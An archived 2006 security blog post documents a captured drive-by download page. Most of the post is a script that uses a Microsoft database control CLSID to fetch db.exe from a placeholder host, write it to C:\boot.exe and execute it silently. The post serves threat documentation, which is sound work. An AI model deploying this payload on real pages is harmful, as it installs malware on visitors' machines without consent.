You are viewing a read-only archive of the Blogs.Harvard network. Learn more.
Skip to content

another variation of drive by downloaders

The exploit used is fairly old. One other important thing to note is that the CLSID used here is a Microsoft database control.

[zero@day testing]$ curl http://EVIL_SITE/db/wm.htm
<script>
var url,path;
url="http://EVIL_SITE/mc/game/db.exe";
path="C:\\boot.exe";
try{
var ado=(document.createElement("object"));
var d=1;
ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var e=1;
var xml=ado.CreateObject("Microsoft.XMLHTTP","");
var f=1;
var ab="Adodb.";
var cd="Stream";
var g=1;
var as=ado.createobject(ab+cd,"");
var h=1;
xml.Open("GET",url,0);
xml.Send();
as.type=1;
var n=1;
as.open();
as.write(xml.responseBody);
as.savetofile(path,2);
as.close();
var shell=ado.createobject("Shell.Application","");
shell.ShellExecute(path,"","","open",0);
}
catch(e){}
;</script>

This was written by zeroday. Posted on Sunday, December 24, 2006, at 9:41 am. Filed under Digital Warfare, Vulnerabilities. Bookmark the permalink. Follow comments here with the RSS feed. Post a comment or leave a trackback.

Post a Comment

You must be logged in to post a comment.
Proudly powered by WordPress. Hosted by Pressable.